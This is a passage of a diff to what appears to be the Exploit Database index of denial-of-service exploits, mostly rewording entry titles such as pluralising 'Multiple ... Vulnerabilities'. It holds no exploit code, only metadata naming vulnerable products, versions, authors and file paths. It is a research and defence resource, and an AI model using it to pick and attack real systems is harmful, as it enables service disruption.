(PoC)",2009-07-10,Cyber-Zone,windows,dos,0 -9113,platforms/windows/dos/9113.txt,"otsAV DJ/TV/Radio - Multiple Local Heap Overflow (PoC)",2009-07-10,Stack,windows,dos,0 +9113,platforms/windows/dos/9113.txt,"otsAV DJ/TV/Radio - Multiple Local Heap Overflows (PoC)",2009-07-10,Stack,windows,dos,0 9114,platforms/windows/dos/9114.txt,"eEye Retina WiFi Security Scanner 1.0 - '.rws Parsing' Buffer Overflow (PoC)",2009-07-10,LiquidWorm,windows,dos,0 9116,platforms/windows/dos/9116.html,"AwingSoft Web3D Player - 'WindsPly.ocx' Remote Buffer Overflow (PoC)",2009-07-10,shinnai,windows,dos,0 9123,platforms/windows/dos/9123.pl,"M3U/M3L to ASX/WPL 1.1 - '.asx' / '.m3u' / '.m3l' Local Buffer Overflow (PoC)",2009-07-11,"ThE g0bL!N",windows,dos,0 @@ -1154,7 +1154,7 @@ id,file,description,date,author,platform,type,port 9417,platforms/windows/dos/9417.txt,"Microsoft Windows Server 2003 - '.EOT' Blue Screen of Death Crash",2009-08-11,webDEViL,windows,dos,0 9423,platforms/windows/dos/9423.pl,"Microsoft Wordpad on winXP SP3 - Local Crash",2009-08-12,murderkey,windows,dos,0 9427,platforms/windows/dos/9427.py,"VideoLAN VLC Media Player 1.0.0/1.0.1 - 'smb://' URI Handling Buffer Overflow (PoC)",2009-08-13,Dr_IDE,windows,dos,0 -9429,platforms/windows/dos/9429.py,"EmbedThis Appweb 3.0B.2-4 - Multiple Remote Buffer Overflow (PoC)",2009-08-13,Dr_IDE,windows,dos,0 +9429,platforms/windows/dos/9429.py,"EmbedThis Appweb 3.0B.2-4 - Multiple Remote Buffer Overflows (PoC)",2009-08-13,Dr_IDE,windows,dos,0 9442,platforms/linux/dos/9442.c,"Linux Kernel < 2.6.30.5 - 'cfg80211' Remote Denial of Service",2009-08-18,"Jon Oberheide",linux,dos,0 9446,platforms/windows/dos/9446.cpp,"HTML Email Creator & Sender 2.3 - Local Buffer Overflow (PoC) (SEH)",2009-08-18,"fl0 fl0w",windows,dos,0 9449,platforms/windows/dos/9449.txt,"TheGreenBow VPN Client - 'tgbvpn.sys' Local Denial of Service",2009-08-18,Evilcry,windows,dos,0 @@ -1395,7 +1395,7 @@ id,file,description,date,author,platform,type,port 11492,platforms/windows/dos/11492.html,"Rising Online Virus Scanner 22.0.0.5 - ActiveX Control Stack Overflow (Denial of Service)",2010-02-18,wirebonder,windows,dos,0 11499,platforms/ios/dos/11499.pl,"iOS FileApp 1.7 - Remote Denial of Service",2010-02-18,Ale46,ios,dos,0 11520,platforms/ios/dos/11520.pl,"iOS iFTPStorage 1.2 - Remote Denial of Service",2010-02-22,Ale46,ios,dos,0 -11529,platforms/multiple/dos/11529.txt,"Multiple Adobe Products - XML External Entity / XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0 +11529,platforms/multiple/dos/11529.txt,"Adobe (Multiple Products) - XML External Entity / XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0 11531,platforms/windows/dos/11531.pl,"Microsoft Windows Media Player 11.0.5721.5145 - '.mpg' Buffer Overflow",2010-02-22,cr4wl3r,windows,dos,0 11532,platforms/windows/dos/11532.html,"Winamp 5.57 - (Browser) IE Denial of Service",2010-02-22,cr4wl3r,windows,dos,0 11533,platforms/windows/dos/11533.pl,"Nero Burning ROM 9.4.13.2 - (iso compilation) Local Buffer Invasion (PoC)",2010-02-22,LiquidWorm,windows,dos,0 @@ -1428,11 +1428,11 @@ id,file,description,date,author,platform,type,port 11705,platforms/multiple/dos/11705.c,"FreeBSD / OpenBSD 'ftpd' - Null Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos,0 11706,platforms/windows/dos/11706.py,"Media Player classic StatsReader - '.stats' Stack Buffer Overflow (PoC)",2010-03-12,ITSecTeam,windows,dos,0 11714,platforms/windows/dos/11714.py,"Mackeitone Media Player - '.m3u' Stack Buffer Overflow",2010-03-13,ITSecTeam,windows,dos,0 -11717,platforms/multiple/dos/11717.php,"Multiple PHP Functions - Local Denial of Service Vulnerabilities",2010-03-13,"Yakir Wizman",multiple,dos,0 +11717,platforms/multiple/dos/11717.php,"PHP (Multiple Functions) - Local Denial of Service Vulnerabilities",2010-03-13,"Yakir Wizman",multiple,dos,0 11724,platforms/windows/dos/11724.pl,"GOM Player 2.1.21 - '.avi' Denial of Service",2010-03-14,En|gma7,windows,dos,0 11728,platforms/windows/dos/11728.pl,"Media Player 6.4.9.1 with K-Lite Codec Pack - '.avi' File Crash (Denial of Service)",2010-03-14,En|gma7,windows,dos,0 14367,platforms/multiple/dos/14367.txt,"Novell Groupwise Webaccess - Stack Overflow",2010-07-15,"Francis Provencher",multiple,dos,0 -11734,platforms/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Remote Unauthenticated Denial of Service (PoC)",2010-03-14,loneferret,windows,dos,0 +11734,platforms/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Remote Unauthenticated Denial of Service Vulnerabilities (PoC)",2010-03-14,loneferret,windows,dos,0 11736,platforms/linux/dos/11736.py,"Kerio MailServer 6.2.2 - Unauthenticated Remote Denial of Service (PoC)",2006-12-14,"Evgeny Legerov",linux,dos,389 11763,platforms/multiple/dos/11763.pl,"Embedthis Appweb 3.1.2 - Remote Denial of Service",2010-03-15,chr1x,multiple,dos,0 11769,platforms/hardware/dos/11769.py,"iPhone Springboard - Malformed Character Crash (PoC)",2010-03-15,"Chase Higgins",hardware,dos,0 @@ -1440,7 +1440,7 @@ id,file,description,date,author,platform,type,port 11792,platforms/multiple/dos/11792.pl,"mplayer 4.4.1 - Null Pointer Dereference (PoC)",2010-03-18,"Pietro Oliva",multiple,dos,0 11803,platforms/windows/dos/11803.txt,"Crimson Editor - Overwrite (SEH)",2010-03-18,sharpe,windows,dos,0 11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP Server 1.0.0 - Unauthenticated Denial of Service (PoC)",2010-03-19,loneferret,windows,dos,21 -11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Crash (SEH) (PoC)",2010-03-19,loneferret,windows,dos,21 +11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Crashs (SEH) (PoC)",2010-03-19,loneferret,windows,dos,21 11827,platforms/windows/dos/11827.py,"no$gba 2.5c - '.nds' Local crash",2010-03-21,l3D,windows,dos,0 11838,platforms/windows/dos/11838.php,"Apple Safari 4.0.5 - Object Tag 'JavaScriptCore.dll' Crash (Denial of Service)",2010-03-22,3lkt3F0k4,windows,dos,0 11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash (PoC)",2010-03-22,b0telh0,windows,dos,0 @@ -1614,7 +1614,7 @@ id,file,description,date,author,platform,type,port 14072,platforms/windows/dos/14072.c,"UltraISO 9.3.6.2750 - '.mds' / '.mdf' Buffer Overflow (PoC)",2010-06-27,"fl0 fl0w",windows,dos,0 14083,platforms/linux/dos/14083.pl,"Scite Text Editor 1.76 - Local Buffer Overflow (PoC)",2010-06-27,kmkz,linux,dos,0 14295,platforms/windows/dos/14295.html,"Microsoft - 'MSHTML.dll' CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak",2010-07-09,"Ruben Santamarta",windows,dos,0 -14099,platforms/windows/dos/14099.py,"MemDb - Multiple Remote Denial of Service",2010-06-28,Markot,windows,dos,80 +14099,platforms/windows/dos/14099.py,"MemDb - Multiple Remote Denial of Service Vulnerabilities",2010-06-28,Markot,windows,dos,80 14102,platforms/windows/dos/14102.py,"Winamp 5.571 - '.avi' Denial of Service",2010-06-28,"Praveen Darshanam",windows,dos,0 14121,platforms/multiple/dos/14121.c,"Adobe Reader 9.3.2 - 'CoolType.dll' Remote Memory Corruption / Denial of Service",2010-06-29,LiquidWorm,multiple,dos,0 14156,platforms/windows/dos/14156.txt,"Microsoft Windows Vista/2008 - NtUserCheckAccessForIntegrityLevel Use-After-Free",2010-07-01,MSRC,windows,dos,0 @@ -1633,7 +1633,7 @@ id,file,description,date,author,platform,type,port 14379,platforms/multiple/dos/14379.txt,"Novell Groupwise Internet Agent - Stack Overflow",2010-07-16,"Francis Provencher",multiple,dos,0 14380,platforms/windows/dos/14380.py,"Power/Personal FTP Server - RETR Denial of Service",2010-07-16,antrhacks,windows,dos,0 14408,platforms/windows/dos/14408.py,"Really Simple IM 1.3beta - Denial of Service (PoC)",2010-07-18,loneferret,windows,dos,0 -14413,platforms/windows/dos/14413.txt,"Microsoft Internet Explorer 7 - Denial of Service Microsoft Clip Organizer Multiple Insecure ActiveX Control",2010-07-20,"Beenu Arora",windows,dos,0 +14413,platforms/windows/dos/14413.txt,"Microsoft Internet Explorer 7 - Microsoft Clip Organizer Multiple Insecure ActiveX Control Denial of Service Vulnerabilities",2010-07-20,"Beenu Arora",windows,dos,0 14414,platforms/windows/dos/14414.txt,"Unreal Tournament 3 2.1 - 'STEAMBLOB' Command Remote Denial of Service",2010-07-20,"Luigi Auriemma",windows,dos,0 14422,platforms/multiple/dos/14422.c,"libpng 1.4.2 - Denial of Service",2010-07-20,kripthor,multiple,dos,0 14424,platforms/windows/dos/14424.txt,"Lithtech Engine - Memory Corruption",2010-07-20,"Luigi Auriemma",windows,dos,0 @@ -1711,7 +1711,7 @@ id,file,description,date,author,platform,type,port 14949,platforms/windows/dos/14949.py,"Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution",2010-09-09,Abysssec,windows,dos,0 14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 / Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0 14971,platforms/windows/dos/14971.py,"Microsoft Word 2007 SP2 - sprmCMajority Buffer Overflow",2010-09-11,Abysssec,windows,dos,0 -14974,platforms/windows/dos/14974.txt,"HP Data Protector Media Operations 6.11 - Multiple Modules Null Pointer Dereference Denial of Service",2010-09-11,d0lc3,windows,dos,0 +14974,platforms/windows/dos/14974.txt,"HP Data Protector Media Operations 6.11 (Multiple Modules) - Null Pointer Dereference Denial of Service",2010-09-11,d0lc3,windows,dos,0 14987,platforms/windows/dos/14987.py,"Kingsoft AntiVirus 2010.04.26.648 - Kernel Buffer Overflow",2010-09-13,"Lufeng Li",windows,dos,0 14990,platforms/windows/dos/14990.txt,"AA SMTP Server 1.1 - Crash (PoC)",2010-09-13,SONIC,windows,dos,0 14992,platforms/windows/dos/14992.py,"RealPlayer - FLV Parsing Integer Overflow",2010-09-13,Abysssec,windows,dos,0 @@ -1839,7 +1839,7 @@ id,file,description,date,author,platform,type,port 15803,platforms/windows/dos/15803.py,"Microsoft IIS 7.5 (Windows 7) - FTPSVC Unauthorized Remote Denial of Service (PoC)",2010-12-21,"Matthew Bergin",windows,dos,0 15738,platforms/windows/dos/15738.pl,"Digital Audio Editor 7.6.0.237 - Local Crash (PoC)",2010-12-15,h1ch4m,windows,dos,0 15739,platforms/windows/dos/15739.pl,"Easy DVD Creator - Local Crash (PoC)",2010-12-15,h1ch4m,windows,dos,0 -15750,platforms/windows/dos/15750.py,"Solar FTP Server 2.0 - Multiple Commands Denial of Service",2010-12-16,modpr0be,windows,dos,0 +15750,platforms/windows/dos/15750.py,"Solar FTP Server 2.0 - Multiple Commands Denial of Service Vulnerabilities",2010-12-16,modpr0be,windows,dos,0 15758,platforms/win_x86/dos/15758.c,"Microsoft Windows - Win32k Pointer Dereferencement (PoC) (MS10-098)",2010-12-17,"Stefan LE BERRE",win_x86,dos,0 15767,platforms/windows/dos/15767.py,"Ecava IntegraXor Remote - ActiveX Buffer Overflow (PoC)",2010-12-18,"Jeremy Brown",windows,dos,0 15786,platforms/windows/dos/15786.py,"Accmeware MP3 Joiner Pro 5.0.9 - Denial of Service (PoC)",2010-12-20,0v3r,windows,dos,0 @@ -1933,7 +1933,7 @@ id,file,description,date,author,platform,type,port 17023,platforms/windows/dos/17023.txt,"iconics genesis32 and genesis64 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,dos,0 17025,platforms/windows/dos/17025.txt,"DATAC RealWin - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,dos,0 17032,platforms/windows/dos/17032.txt,"VMCPlayer 1.0 - Denial of Service",2011-03-23,BraniX,windows,dos,0 -17033,platforms/windows/dos/17033.py,"IGSS 8 ODBC Server - Multiple Remote Uninitialized Pointer Free Denial of Service",2011-03-23,"Jeremy Brown",windows,dos,0 +17033,platforms/windows/dos/17033.py,"IGSS 8 ODBC Server - Multiple Remote Uninitialized Pointer Free Denial of Service Vulnerabilities",2011-03-23,"Jeremy Brown",windows,dos,0 17045,platforms/windows/dos/17045.py,"Avaya IP Office Manager 8.1 TFTP - Denial of Service",2011-03-24,"Craig Freyman",windows,dos,69 17070,platforms/windows/dos/17070.py,"Rumble 0.25.2232 - Denial of Service",2011-03-29,"AutoSec Tools",windows,dos,0 17071,platforms/windows/dos/17071.py,"GOM Player 2.1.28.5039 - AVI Denial of Service (PoC)",2011-03-29,BraniX,windows,dos,0 @@ -2033,7 +2033,7 @@ id,file,description,date,author,platform,type,port 17842,platforms/windows/dos/17842.txt,"progea movicon / powerhmi 11.2.1085 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0 17843,platforms/windows/dos/17843.txt,"Rockwell RSLogix 19 - Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0 17844,platforms/windows/dos/17844.txt,"Measuresoft ScadaPro 4.0.0 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0 -17856,platforms/windows/dos/17856.py,"KnFTP 1.0.0 Server - Multiple Buffer Overflow (Denial of Service) (PoC)",2011-09-18,loneferret,windows,dos,21 +17856,platforms/windows/dos/17856.py,"KnFTP 1.0.0 Server - Multiple Buffer Overflows (Denial of Service) (PoC)",2011-09-18,loneferret,windows,dos,21 17878,platforms/windows/dos/17878.txt,"EViews 7.0.0.1 (aka 7.2) - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 17879,platforms/windows/dos/17879.txt,"MetaServer RT 3.2.1.450 - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 17885,platforms/windows/dos/17885.txt,"sunway ForceControl 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",windows,dos,0 @@ -2056,7 +2056,7 @@ id,file,description,date,author,platform,type,port 17981,platforms/windows/dos/17981.py,"Microsoft Windows - TCP/IP Stack Denial of Service (MS11-064)",2011-10-15,"Byoungyoung Lee",windows,dos,0 17982,platforms/windows/dos/17982.pl,"BlueZone Desktop - '.zap' file Local Denial of Service",2011-10-15,Silent_Dream,windows,dos,0 18006,platforms/windows/dos/18006.html,"Opera 11.52 - Denial of Service (PoC)",2011-10-20,pigtail23,windows,dos,0 -18007,platforms/windows/dos/18007.txt,"Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow",2011-10-20,rgod,windows,dos,0 +18007,platforms/windows/dos/18007.txt,"Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflows",2011-10-20,rgod,windows,dos,0 18008,platforms/windows/dos/18008.html,"Opera 11.52 - Stack Overflow",2011-10-20,pigtail23,windows,dos,0 18011,platforms/windows/dos/18011.txt,"UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow",2011-10-20,DiGMi,windows,dos,0 18014,platforms/windows/dos/18014.html,"Opera 11.51 - Use-After-Free Crash (PoC)",2011-10-21,"Roberto Suggi Liverani",windows,dos,0 @@ -2069,7 +2069,7 @@ id,file,description,date,author,platform,type,port 40298,platforms/windows/dos/40298.py,"Goron WebServer 2.0 - Multiple Vulnerabilities",2016-08-29,"Guillaume Kaddouch",windows,dos,80 18028,platforms/windows/dos/18028.py,"zFTPServer - 'cwd/stat' Remote Denial of Service",2011-10-24,"Myo Soe",windows,dos,0 18029,platforms/windows/dos/18029.pl,"BlueZone - '.zft' File Local Denial of Service",2011-10-24,"Iolo Morganwg",windows,dos,0 -18030,platforms/windows/dos/18030.pl,"BlueZone Desktop Multiple - Malformed Files Local Denial of Service Vulnerabilities",2011-10-25,Silent_Dream,windows,dos,0 +18030,platforms/windows/dos/18030.pl,"BlueZone Desktop - Multiple Malformed Files Local Denial of Service Vulnerabilities",2011-10-25,Silent_Dream,windows,dos,0 18049,platforms/windows/dos/18049.txt,"Microsys PROMOTIC 8.1.4 - ActiveX GetPromoticSite Unitialized Pointer",2011-10-13,"Luigi Auriemma",windows,dos,0 18052,platforms/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Based Buffer Overflow (PoC)",2011-10-31,rgod,windows,dos,0 18078,platforms/windows/dos/18078.txt,"Microsoft Excel 2003 11.8335.8333 - Use-After-Free",2011-11-04,"Luigi Auriemma",windows,dos,0 @@ -2089,7 +2089,7 @@ id,file,description,date,author,platform,type,port 18200,platforms/windows/dos/18200.txt,"SopCast 3.4.7 - 'sop://' URI Handling Remote Stack Buffer Overflow (PoC)",2011-12-05,LiquidWorm,windows,dos,0 18196,platforms/windows/dos/18196.py,"NJStar Communicator MiniSmtp - Buffer Overflow (ASLR Bypass)",2011-12-03,Zune,windows,dos,0 18199,platforms/hardware/dos/18199.pl,"ShareCenter D-Link DNS-320 - Remote reboot/shutdown/reset (Denial of Service)",2011-12-05,rigan,hardware,dos,0 -18220,platforms/windows/dos/18220.py,"CyberLink Multiple Products - File Project Handling Stack Buffer Overflow (PoC)",2011-12-09,modpr0be,windows,dos,0 +18220,platforms/windows/dos/18220.py,"CyberLink (Multiple Products) - File Project Handling Stack Buffer Overflow (PoC)",2011-12-09,modpr0be,windows,dos,0 18221,platforms/linux/dos/18221.c,"Apache - Denial of Service",2011-12-09,"Ramon de C Valle",linux,dos,0 18223,platforms/windows/dos/18223.pl,"Free Opener - Local Denial of Service",2011-12-09,"Iolo Morganwg",windows,dos,0 18225,platforms/linux/dos/18225.c,"CSF Firewall - Buffer Overflow",2011-12-09,"FoX HaCkEr",linux,dos,0 @@ -2133,7 +2133,7 @@ id,file,description,date,author,platform,type,port 18460,platforms/php/dos/18460.php,"PHP 5.4.0RC6 (x64) - Denial of Service",2012-02-04,"Stefan Esser",php,dos,0 18461,platforms/windows/dos/18461.html,"Edraw Diagram Component 5 - ActiveX Buffer Overflow Denial of Service",2012-02-04,"Senator of Pirates",windows,dos,0 18463,platforms/windows/dos/18463.html,"PDF Viewer Component - ActiveX Denial of Service",2012-02-05,"Senator of Pirates",windows,dos,0 -18469,platforms/windows/dos/18469.pl,"TYPSoft FTP Server 1.10 - Multiple Commands Denial of Service",2012-02-07,"Balazs Makany",windows,dos,0 +18469,platforms/windows/dos/18469.pl,"TYPSoft FTP Server 1.10 - Multiple Commands Denial of Service Vulnerabilities",2012-02-07,"Balazs Makany",windows,dos,0 18475,platforms/windows/dos/18475.c,"PeerBlock 1.1 - Blue Screen of Death Exploit",2012-02-09,shinnai,windows,dos,0 18481,platforms/windows/dos/18481.py,"jetVideo 8.0.2 - Denial of Service",2012-02-10,"Senator of Pirates",windows,dos,0 18488,platforms/windows/dos/18488.txt,"Novell Groupwise Messenger 2.1.0 - Arbitrary Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 @@ -2168,7 +2168,7 @@ id,file,description,date,author,platform,type,port 18661,platforms/windows/dos/18661.txt,"RealPlayer - '.mp4' file handling memory Corruption",2012-03-24,"Senator of Pirates",windows,dos,0 18665,platforms/multiple/dos/18665.py,"PHP 5.4.0 Built-in Web Server - Denial of Service (PoC)",2012-03-25,ls,multiple,dos,0 18671,platforms/windows/dos/18671.pl,"KnFTPd 1.0.0 - 'FEAT' Denial of Service (PoC)",2012-03-28,"Stefan Schurtz",windows,dos,0 -18717,platforms/windows/dos/18717.txt,"AnvSoft Any Video Converter 4.3.6 - Multiple Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0 +18717,platforms/windows/dos/18717.txt,"AnvSoft Any Video Converter 4.3.6 - Multiple Buffer Overflows",2012-04-08,Vulnerability-Lab,windows,dos,0 18688,platforms/hardware/dos/18688.txt,"EMC Data Protection Advisor 5.8.1 - Denial of Service",2012-03-31,"Luigi Auriemma",hardware,dos,0 18691,platforms/windows/dos/18691.rb,"FoxPlayer 2.6.0 - Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",windows,dos,0 18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 - '.aiff' Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0 @@ -2404,7 +2404,7 @@ id,file,description,date,author,platform,type,port 20005,platforms/windows/dos/20005.c,"Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (1)",2000-06-08,"Renaud Deraison",windows,dos,0 20006,platforms/windows/dos/20006.nasl,"Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (MS00-040) (2)",2000-06-08,"Renaud Deraison",windows,dos,0 20015,platforms/windows/dos/20015.txt,"AnalogX SimpleServer:WWW 1.0.5 - Denial of Service",2000-07-15,"Ussr Labs",windows,dos,0 -20016,platforms/windows/dos/20016.py,"Shadow Op Software Dragon Server 1.0/2.0 - Multiple Denial of Service",2000-06-16,Prizm,windows,dos,0 +20016,platforms/windows/dos/20016.py,"Shadow Op Software Dragon Server 1.0/2.0 - Multiple Denial of Service Vulnerabilities",2000-06-16,Prizm,windows,dos,0 20017,platforms/windows/dos/20017.py,"Max Feoktistov Small HTTP server 1.212 - Buffer Overflow",2000-06-16,"Ussr Labs",windows,dos,0 20020,platforms/windows/dos/20020.txt,"Alt-N MDaemon 2.8.5 - UIDL Denial of Service",2000-06-16,Craig,windows,dos,0 20023,platforms/linux/dos/20023.c,"Gnome 1.0/1.1 / Group X 11.0 / XFree86 X11R6 3.3.x/4.0 - Denial of Service",2000-06-19,"Chris Evans",linux,dos,0 @@ -2517,7 +2517,7 @@ id,file,description,date,author,platform,type,port 20739,platforms/sco/dos/20739.txt,"SCO Open Server 5.0.6 - lpusers Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos,0 20742,platforms/sco/dos/20742.txt,"SCO Open Server 5.0.6 - recon Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos,0 20747,platforms/linux/dos/20747.txt,"Oracle Application Server 4.0.8.2 - ndwfn4.so Buffer Overflow",2001-04-11,"Fyodor Yarochkin",linux,dos,0 -20750,platforms/linux/dos/20750.txt,"Trend Micro Interscan VirusWall (Linux) 3.0.1 - Multiple Program Buffer Overflow",2001-04-13,"eeye security",linux,dos,0 +20750,platforms/linux/dos/20750.txt,"Trend Micro Interscan VirusWall (Linux) 3.0.1 - Multiple Program Buffer Overflows",2001-04-13,"eeye security",linux,dos,0 20753,platforms/cgi/dos/20753.txt,"IBM Websphere/Net.Commerce 3 - CGI-BIN Macro Denial of Service",2001-04-13,"ET LoWNOISE",cgi,dos,0 20763,platforms/windows/dos/20763.c,"Microsoft ISA Server 2000 Web Proxy - Denial of Service",2001-04-16,"SecureXpert Labs",windows,dos,0 20770,platforms/windows/dos/20770.txt,"GoAhead Software GoAhead WebServer (Windows) 2.1 - Denial of Service",2001-04-17,nemesystm,windows,dos,0 @@ -2535,7 +2535,7 @@ id,file,description,date,author,platform,type,port 20821,platforms/hardware/dos/20821.txt,"Cisco HSRP - Denial of Service",2001-05-03,bashis,hardware,dos,0 20824,platforms/hardware/dos/20824.txt,"Cisco Catalyst 2900 12.0 - (5.2)XU SNMP Empty UDP Packet Denial of Service",2001-05-03,bashis,hardware,dos,0 20827,platforms/multiple/dos/20827.pl,"Hughes Technologies DSL_Vdns 1.0 - Denial of Service",2001-05-07,neme-dhc,multiple,dos,0 -20828,platforms/windows/dos/20828.txt,"SpyNet 6.5 Chat Server - Multiple Connection Denial of Service",2001-05-07,nemesystm,windows,dos,0 +20828,platforms/windows/dos/20828.txt,"SpyNet 6.5 Chat Server - Multiple Connection Denial of Service Vulnerabilities",2001-05-07,nemesystm,windows,dos,0 20830,platforms/windows/dos/20830.txt,"T. Hauck Jana Server 1.45/1.46/2.0 - MS-DOS Device Name Denial of Service",2001-05-07,neme-dhc,windows,dos,0 20834,platforms/windows/dos/20834.txt,"ElectroSoft ElectroComm 1.0/2.0 - Denial of Service",2001-05-07,nemesystm,windows,dos,0 20844,platforms/osx/dos/20844.txt,"Apple Personal Web Sharing 1.1/1.5/1.5.5 - Remote Denial of Service",2001-05-10,"Jass Seljamaa",osx,dos,0 @@ -2574,7 +2574,7 @@ id,file,description,date,author,platform,type,port 21048,platforms/cgi/dos/21048.txt,"John O'Fallon Responder.cgi 1.0 - Denial of Service",1999-04-09,Epic,cgi,dos,0 21074,platforms/unix/dos/21074.pl,"glFTPd 1.x - 'LIST' Denial of Service",2001-08-17,"ASGUARD LABS",unix,dos,0 21077,platforms/bsd/dos/21077.c,"BSDI 3.0/3.1 - Possible Local Kernel Denial of Service",2001-08-21,V9,bsd,dos,0 -21092,platforms/hardware/dos/21092.txt,"Cisco CBOS 2.x - Multiple TCP Connection Denial of Service",2001-08-23,"Cisco Security",hardware,dos,0 +21092,platforms/hardware/dos/21092.txt,"Cisco CBOS 2.x - Multiple TCP Connection Denial of Service Vulnerabilities",2001-08-23,"Cisco Security",hardware,dos,0 40419,platforms/linux/dos/40419.c,"Linux - SELinux W+X Protection Bypass via AIO",2016-09-23,"Google Security Research",linux,dos,0 21099,platforms/windows/dos/21099.c,"Microsoft Windows Server 2000 - RunAs Service Denial of Service",2001-12-11,Camisade,windows,dos,0 21103,platforms/hardware/dos/21103.c,"D-Link Dl-704 2.56 b5 - IP Fragment Denial of Service",2000-05-23,phonix,hardware,dos,0 @@ -2585,8 +2585,8 @@ id,file,description,date,author,platform,type,port 21147,platforms/windows/dos/21147.txt,"WAP Proof 2008 - Denial of Service",2012-09-08,"Orion Einfold",windows,dos,0 21141,platforms/linux/dos/21141.txt,"RedHat TUX 2.1.0-2 - HTTP Server Oversized Host Denial of Service",2001-11-05,"Aiden ORawe",linux,dos,0 21143,platforms/windows/dos/21143.pl,"Raptor Firewall 4.0/5.0/6.0.x - Zero Length UDP Packet Resource Consumption",2001-06-21,"Max Moser",windows,dos,0 -21162,platforms/windows/dos/21162.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service (1)",2001-11-29,"Alex Hernandez",windows,dos,0 -21163,platforms/windows/dos/21163.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service (2)",2001-11-29,"Alex Hernandez",windows,dos,0 +21162,platforms/windows/dos/21162.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service Vulnerabilities (1)",2001-11-29,"Alex Hernandez",windows,dos,0 +21163,platforms/windows/dos/21163.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service Vulnerabilities (2)",2001-11-29,"Alex Hernandez",windows,dos,0 21167,platforms/openbsd/dos/21167.c,"OpenBSD 2.x/3.0 - User Mode Return Value Denial of Service",2001-12-03,"Marco Peereboom",openbsd,dos,0 21170,platforms/windows/dos/21170.txt,"Volition Red Faction 1.0/1.1 - Game Server/Client Denial of Service",2001-12-07,sh0,windows,dos,0 21171,platforms/windows/dos/21171.c,"Microsoft Windows Server 2000 - Internet Key Exchange Denial of Service (1)",2001-12-11,"Nelson Brito",windows,dos,0 @@ -2617,7 +2617,7 @@ id,file,description,date,author,platform,type,port 21307,platforms/windows/dos/21307.txt,"Rit Research Labs The Bat! 1.53 - Microsoft Denial of Service Device Name Denial of Service",2002-02-27,3APA3A,windows,dos,0 21326,platforms/windows/dos/21326.txt,"Novell Groupwise 8.0.2 HP3 and 2012 - Integer Overflow",2012-09-17,"Francis Provencher",windows,dos,0 21333,platforms/windows/dos/21333.txt,"AOL Instant Messenger 4.x - Hyperlink Denial of Service",2002-03-01,"NtWaK0 & Recon",windows,dos,0 -21336,platforms/windows/dos/21336.txt,"Xerver 2.10 - Multiple Request Denial of Service",2002-03-08,"Alex Hernandez",windows,dos,0 +21336,platforms/windows/dos/21336.txt,"Xerver 2.10 - Multiple Request Denial of Service Vulnerabilities",2002-03-08,"Alex Hernandez",windows,dos,0 21337,platforms/multiple/dos/21337.c,"Menasoft SPHEREserver 0.99 - Denial of Service",2002-03-09,"H Zero Seven",multiple,dos,0 21338,platforms/linux/dos/21338.pl,"XTux Server 2001.0 6.01 - Garbage Denial of Service",2002-03-09,b0iler,linux,dos,0 21345,platforms/unix/dos/21345.txt,"Qualcomm QPopper 4.0.x - Remote Denial of Service",2002-03-15,"Jonas Frey",unix,dos,0 @@ -2806,7 +2806,7 @@ id,file,description,date,author,platform,type,port 22360,platforms/multiple/dos/22360.java,"Sun JDK/SDK 1.3/1.4 / IBM JDK 1.3.1 / BEA Systems WebLogic 5/6/7 - java.util.zip Null Value Denial of Service (3)",2003-03-15,"Marc Schoenefeld",multiple,dos,0 22370,platforms/linux/dos/22370.txt,"Ximian Evolution 1.x - UUEncoding Denial of Service",2003-03-17,"Core Security",linux,dos,0 22390,platforms/windows/dos/22390.c,"Microsoft ActiveSync 3.5 - Null Pointer Dereference Denial of Service",2003-03-20,"Andy Davis",windows,dos,0 -22395,platforms/windows/dos/22395.txt,"eDonkey Clients 0.44/0.45 - Multiple Chat Dialog Resource Consumption",2003-03-21,"Auriemma Luigi",windows,dos,0 +22395,platforms/windows/dos/22395.txt,"eDonkey Clients 0.44/0.45 - Multiple Chat Dialog Resource Consumption Vulnerabilities",2003-03-21,"Auriemma Luigi",windows,dos,0 22397,platforms/windows/dos/22397.txt,"SIEMENS Sipass 